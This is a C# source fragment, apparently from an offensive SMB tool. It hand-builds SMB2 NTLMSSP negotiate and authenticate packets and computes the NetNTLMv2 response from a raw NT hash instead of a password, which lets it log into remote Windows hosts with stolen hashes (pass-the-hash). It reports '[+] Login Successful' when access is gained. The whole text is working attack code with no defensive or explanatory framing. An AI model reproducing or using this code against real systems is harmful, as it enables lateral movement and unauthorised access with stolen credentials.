////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal void NTLMSSPNegotiate()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x01, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
Byte[] bHeader = header.GetHeader();
SMB2NTLMSSPNegotiate NTLMSSPNegotiate = new SMB2NTLMSSPNegotiate(version);
NTLMSSPNegotiate.SetFlags(flags);
Byte[] bNegotiate = NTLMSSPNegotiate.GetSMB2NTLMSSPNegotiate();
SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
sessionSetup.SetSecurityBlob(bNegotiate);
Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(bSessionService, bHeader);
send = Combine.combine(send, bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean Authenticate(String domain, String username, String hash)
{
String NTLMSSP = BitConverter.ToString(recieve).Replace("-", "");
Int32 index = NTLMSSP.IndexOf("4E544C4D53535000") / 2;
UInt16 wDomain = BitConverter.ToUInt16(recieve.Skip(index + 12).Take(2).ToArray(), 0);
UInt16 wtarget = BitConverter.ToUInt16(recieve.Skip(index + 40).Take(2).ToArray(), 0);
sessionId = recieve.Skip(44).Take(8).ToArray();
Byte[] bServerChallenge = recieve.Skip(index + 24).Take(8).ToArray();
Int32 start = index + 56 + wDomain;
Int32 end = index + 55 + wDomain + wtarget;
Byte[] details = recieve.Skip(start).Take(end - start + 1).ToArray();
Byte[] bTime = details.Skip(details.Length - 12).Take(8).ToArray();
Int32 j = 0;
Byte[] bHash = new Byte[hash.Length / 2];
for (Int32 i = 0; i < hash.Length; i += 2)
{
bHash[j++] = (Byte)((Char)Convert.ToInt16(hash.Substring(i, 2),16));
}
Byte[] bHostname = Encoding.Unicode.GetBytes(Environment.MachineName);
Byte[] hostnameLength = BitConverter.GetBytes(bHostname.Length).Take(2).ToArray();
Byte[] bDomain = Encoding.Unicode.GetBytes(domain);
Byte[] domainLength = BitConverter.GetBytes(bDomain.Length).Take(2).ToArray();
Byte[] bUsername = Encoding.Unicode.GetBytes(username);
Byte[] usernameLength = BitConverter.GetBytes(bUsername.Length).Take(2).ToArray();
Byte[] domainOffset = { 0x40, 0x00, 0x00, 0x00 };
Byte[] usernameOffset = BitConverter.GetBytes(bDomain.Length + 64);
Byte[] hostnameOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + 64);
Byte[] lmOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 64);
Byte[] ntOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 88);
String usernameTarget = username.ToUpper();
Byte[] bUsernameTarget = Encoding.Unicode.GetBytes(usernameTarget);
bUsernameTarget = Combine.combine(bUsernameTarget, bDomain);
Byte[] NetNTLMv2Hash;
using (HMACMD5 hmac = new HMACMD5())
{
hmac.Key = bHash;
NetNTLMv2Hash = hmac.ComputeHash(bUsernameTarget);
}
Byte[] bClientChallenge = new Byte[8];
Random random = new Random();
for (Int32 i = 0; i < 8; i++)
{
bClientChallenge[i] = (Byte)random.Next(0, 255);
}
Byte[] blob = Combine.combine(new Byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, bTime);
blob = Combine.combine(blob, bClientChallenge);
blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00 });
blob = Combine.combine(blob, details);
blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
Byte[] bServerChallengeAndBlob = Combine.combine(bServerChallenge, blob);
Byte[] NetNTLMv2Response;
using (HMACMD5 hmacMD5 = new HMACMD5())
{
hmacMD5.Key = NetNTLMv2Hash;
NetNTLMv2Response = hmacMD5.ComputeHash(bServerChallengeAndBlob);
}
if (signing)
{
using (HMACMD5 hmacMD5 = new HMACMD5())
{
hmacMD5.Key = NetNTLMv2Hash;
sessionKey = hmacMD5.ComputeHash(NetNTLMv2Response);
}
}
NetNTLMv2Response = Combine.combine(NetNTLMv2Response, blob);
Byte[] NetNTLMv2ResponseLength = BitConverter.GetBytes(NetNTLMv2Response.Length).Take(2).ToArray();
Byte[] sessionKeyOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + NetNTLMv2Response.Length + 88);
Byte[] NetNTLMSSPResponse = { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00 };
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, lmOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, ntOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, flags);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bDomain);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bUsername);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bHostname);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2Response);
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x01, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
Byte[] bHeader = header.GetHeader();
NTLMSSPAuth ntlmSSPAuth = new NTLMSSPAuth();
ntlmSSPAuth.SetNetNTLMResponse(NetNTLMSSPResponse);
Byte[] bNTLMSSPAuth = ntlmSSPAuth.GetNTLMSSPAuth();
SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
sessionSetup.SetSecurityBlob(bNTLMSSPAuth);
Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
Console.WriteLine("[+] Login Successful");
return true;
}
else
return false;
}
